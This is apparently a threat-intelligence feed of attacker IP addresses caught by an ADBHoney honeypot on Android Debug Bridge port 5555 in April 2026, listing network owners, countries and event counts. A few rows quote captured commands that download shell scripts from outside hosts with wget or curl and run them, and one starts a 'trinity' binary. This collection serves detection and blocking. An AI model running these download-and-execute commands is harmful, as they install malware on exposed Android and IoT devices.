IPv4	165.232.138.158	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-08T19:26:49.000Z \| last_seen=2026-04-08T19:37:04.630Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	220.92.184.225	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-08T21:00:53.000Z \| last_seen=2026-04-17T20:50:11.244Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	64.23.153.205	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-08T21:15:09.000Z \| last_seen=2026-04-08T21:16:15.280Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	185.226.197.12	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=PT; asn=21859; asn_org=Zenlayer Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-08T22:59:38.000Z \| last_seen=2026-04-08T23:00:43.016Z \| ports=5555 \| cc=PT \| asn=21859 \| org=Zenlayer Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	185.226.197.15	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=PT; asn=21859; asn_org=Zenlayer Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-08T23:01:22.000Z \| last_seen=2026-04-08T23:11:28.966Z \| ports=5555 \| cc=PT \| asn=21859 \| org=Zenlayer Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	147.185.132.141	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-09T03:53:50.000Z \| last_seen=2026-04-09T04:05:15.111Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	181.65.127.89	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PE; asn=6147; asn_org=INTEGRATEL PERU S.A.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T03:37:15.000Z \| last_seen=2026-04-09T03:47:25.161Z \| ports=5555 \| cc=PE \| asn=6147 \| org=INTEGRATEL PERU S.A.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	71.6.134.232	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-09T03:49:50.000Z \| last_seen=2026-04-09T04:50:18.317Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	80.94.92.16	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-09T05:28:14.000Z \| last_seen=2026-04-09T05:29:23.273Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	110.86.173.107	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-09T07:18:20.000Z \| last_seen=2026-04-09T07:19:24.254Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	135.237.123.227	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-09T07:25:40.000Z \| last_seen=2026-04-09T07:36:26.383Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	1.24.230.27	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-09T08:32:53.000Z \| last_seen=2026-04-09T08:34:02.060Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	139.59.245.108	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-09T08:42:08.000Z \| last_seen=2026-04-09T08:52:25.146Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	178.85.223.80	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=NL; asn=33915; asn_org=Vodafone Libertel B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T09:53:14.000Z \| last_seen=2026-04-09T10:03:18.290Z \| ports=5555 \| cc=NL \| asn=33915 \| org=Vodafone Libertel B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	71.57.113.244	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T10:19:48.000Z \| last_seen=2026-04-09T10:29:51.820Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	14.152.90.225	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134763; asn_org=CHINANET Guangdong province network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-09T13:05:03.000Z \| last_seen=2026-04-09T13:06:06.563Z \| ports=5555 \| cc=CN \| asn=134763 \| org=CHINANET Guangdong province network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	143.198.228.234	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-09T13:01:17.000Z \| last_seen=2026-04-09T13:18:12.184Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	206.212.255.94	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=13737; asn_org=Interconnecx, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=221 \| first_seen=2026-04-09T13:41:10.000Z \| last_seen=2026-04-21T12:50:43.716Z \| ports=5555 \| cc=US \| asn=13737 \| org=Interconnecx, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	45.135.194.83	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=272 \| first_seen=2026-04-09T13:02:08.000Z \| last_seen=2026-04-27T16:16:43.485Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	142.248.80.163	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=22295; asn_org=Advin Services LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=51 \| first_seen=2026-04-09T14:30:36.000Z \| last_seen=2026-04-12T05:28:00.595Z \| ports=5555 \| cc=US \| asn=22295 \| org=Advin Services LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	64.62.156.10	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T14:21:53.000Z \| last_seen=2026-04-09T14:32:03.247Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	64.62.156.20	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-09T14:20:01.000Z \| last_seen=2026-04-09T14:21:07.376Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	143.42.1.189	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-09T15:47:03.000Z \| last_seen=2026-04-09T15:48:09.699Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	172.236.106.113	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-09T15:47:16.000Z \| last_seen=2026-04-09T15:48:17.680Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	43.228.157.130	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=PK; asn=205759; asn_org=Ghosty Networks LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://43.228.157.130/w.sh; sh w.sh android.exploit; curl http://43.228.157.130/c.sh; sh c.sh android.exploit" Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-09T18:19:00.000Z \| last_seen=2026-04-09T18:20:56.499Z \| ports=5555 \| cc=PK \| asn=205759 \| org=Ghosty Networks LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	71.6.158.166	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-09T19:24:39.000Z \| last_seen=2026-04-09T19:35:23.480Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	196.170.7.51	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=TG; asn=24691; asn_org=TOGOTEL-AS TogoTelecom, Togo; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T20:52:54.000Z \| last_seen=2026-04-09T21:03:01.708Z \| ports=5555 \| cc=TG \| asn=24691 \| org=TOGOTEL-AS TogoTelecom, Togo	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	80.94.92.12	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-09T20:21:43.000Z \| last_seen=2026-04-09T20:22:46.111Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	176.65.139.101	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://43.228.157.130/w.sh; sh w.sh android.exploit; curl http://43.228.157.130/c.sh; sh c.sh android.exploit" Observed in ADBHoney telemetry for 2026-04. events=74 \| first_seen=2026-04-09T22:52:16.000Z \| last_seen=2026-04-16T15:44:15.591Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-09
IPv4	177.104.7.224	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=BR; asn=28343; asn_org=UNIFIQUE TELECOMUNICACOES SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-09T23:08:10.000Z \| last_seen=2026-04-09T23:18:15.567Z \| ports=5555 \| cc=BR \| asn=28343 \| org=UNIFIQUE TELECOMUNICACOES SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	91.224.92.177	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=GB; asn=209605; asn_org=UAB Host Baltic; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://94.156.152.67:83/w.sh; sh w.sh; curl http://94.156.152.67:83/c.sh; sh c.sh; wget http://94.156.152.67:83/wget.sh; sh wg" Observed in ADBHoney telemetry for 2026-04. events=250 \| first_seen=2026-04-09T23:17:54.000Z \| last_seen=2026-04-22T16:59:09.269Z \| ports=5555 \| cc=GB \| asn=209605 \| org=UAB Host Baltic	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	147.185.132.78	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-10T01:02:44.000Z \| last_seen=2026-04-10T01:14:14.429Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	148.63.100.254	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PT; asn=12353; asn_org=Vodafone Portugal - Communicacoes Pessoais S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-10T03:06:47.000Z \| last_seen=2026-04-23T03:43:37.875Z \| ports=5555 \| cc=PT \| asn=12353 \| org=Vodafone Portugal - Communicacoes Pessoais S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	193.163.125.17	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=GB; asn=211298; asn_org=Driftnet Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T03:45:58.000Z \| last_seen=2026-04-10T03:47:04.332Z \| ports=5555 \| cc=GB \| asn=211298 \| org=Driftnet Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	181.175.2.10	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=EC; asn=14522; asn_org=SERVICIOS DE TELECOMUNICACIONES SETEL S.A. XTRIM EC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-10T04:42:51.000Z \| last_seen=2026-04-10T04:53:02.663Z \| ports=5555 \| cc=EC \| asn=14522 \| org=SERVICIOS DE TELECOMUNICACIONES SETEL S.A. XTRIM EC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	186.65.85.164	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=AR; asn=52380; asn_org=Sista S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-10T04:40:07.000Z \| last_seen=2026-04-10T05:24:08.894Z \| ports=5555 \| cc=AR \| asn=52380 \| org=Sista S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	117.26.222.22	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T05:25:04.000Z \| last_seen=2026-04-10T05:26:05.348Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	47.250.119.77	Attacker IP • ADB / seen in ADBHoney; events=49; ports=5555; cc=MY; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=2 Observed in ADBHoney telemetry for 2026-04. events=49 \| first_seen=2026-04-10T05:40:06.000Z \| last_seen=2026-04-10T05:42:05.806Z \| ports=5555 \| cc=MY \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	221.233.24.226	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-10T06:48:40.000Z \| last_seen=2026-04-29T02:08:43.690Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	66.132.195.146	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T06:52:37.000Z \| last_seen=2026-04-10T06:54:17.426Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	65.49.20.106	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-10T08:42:50.000Z \| last_seen=2026-04-10T08:43:58.313Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	65.49.20.66	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-10T08:43:25.000Z \| last_seen=2026-04-10T08:53:37.613Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	223.104.82.34	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T09:52:55.000Z \| last_seen=2026-04-10T09:54:03.497Z \| ports=5555 \| cc=CN \| asn=56040 \| org=China Mobile communications corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	58.214.254.246	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=61 \| first_seen=2026-04-10T10:44:36.000Z \| last_seen=2026-04-10T10:59:23.041Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-10
IPv4	198.245.112.240	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=CA; asn=803; asn_org=Saskatchewan Telecommunications; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-10T12:55:34.000Z \| last_seen=2026-04-10T13:08:12.606Z \| ports=5555 \| cc=CA \| asn=803 \| org=Saskatchewan Telecommunications	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	45.194.92.18	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T13:29:37.000Z \| last_seen=2026-04-10T13:30:44.129Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	65.49.1.162	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-10T13:06:43.000Z \| last_seen=2026-04-12T13:48:12.116Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	45.71.39.94	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=EC; asn=52468; asn_org=UFINET PANAMA S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-10T14:47:01.000Z \| last_seen=2026-04-10T14:57:03.666Z \| ports=5555 \| cc=EC \| asn=52468 \| org=UFINET PANAMA S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	102.32.207.50	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=ZA; asn=327782; asn_org=METROFIBRE-NETWORX; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-10T15:42:27.000Z \| last_seen=2026-04-10T15:52:31.887Z \| ports=5555 \| cc=ZA \| asn=327782 \| org=METROFIBRE-NETWORX	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	139.144.239.72	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-10T15:46:45.000Z \| last_seen=2026-04-12T15:47:54.348Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	172.236.111.98	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T15:47:31.000Z \| last_seen=2026-04-10T15:48:39.021Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	154.116.13.140	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=GA; asn=16058; asn_org=Gabon-Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-10T17:56:04.000Z \| last_seen=2026-04-10T18:10:19.966Z \| ports=5555 \| cc=GA \| asn=16058 \| org=Gabon-Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	102.219.26.53	Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=ZA; asn=11845; asn_org=Vox-Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=28 \| first_seen=2026-04-10T18:07:07.000Z \| last_seen=2026-04-10T18:17:27.875Z \| ports=5555 \| cc=ZA \| asn=11845 \| org=Vox-Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	104.243.35.94	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-10T19:32:08.000Z \| last_seen=2026-04-10T19:33:15.423Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	82.147.88.88	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=RU; asn=211860; asn_org=Nerushenko Vyacheslav Nikolaevich; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-10T19:11:00.000Z \| last_seen=2026-04-10T19:24:37.893Z \| ports=5555 \| cc=RU \| asn=211860 \| org=Nerushenko Vyacheslav Nikolaevich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	102.206.113.135	Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=KE; asn=328987; asn_org=LESL-AS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=28 \| first_seen=2026-04-10T21:00:54.000Z \| last_seen=2026-04-10T21:11:10.747Z \| ports=5555 \| cc=KE \| asn=328987 \| org=LESL-AS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	121.160.3.130	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-10T21:17:38.000Z \| last_seen=2026-04-10T21:27:50.965Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	87.251.64.155	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=200730; asn_org=ISAEV Igor; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-10T21:58:21.000Z \| last_seen=2026-04-10T21:59:24.998Z \| ports=5555 \| cc=US \| asn=200730 \| org=ISAEV Igor	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	172.105.177.106	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-10T22:39:54.000Z \| last_seen=2026-04-10T22:50:02.756Z \| ports=5555 \| cc=AU \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-10
IPv4	104.243.43.7	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-10T23:47:32.000Z \| last_seen=2026-04-10T23:57:37.689Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	100.29.192.40	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-11T03:03:46.000Z \| last_seen=2026-04-11T03:05:21.124Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	18.97.26.86	Attacker IP • ADB / seen in ADBHoney; events=53; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=53 \| first_seen=2026-04-11T03:14:22.000Z \| last_seen=2026-04-11T03:25:08.493Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	205.210.31.57	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-11T03:05:23.000Z \| last_seen=2026-04-11T03:16:56.813Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
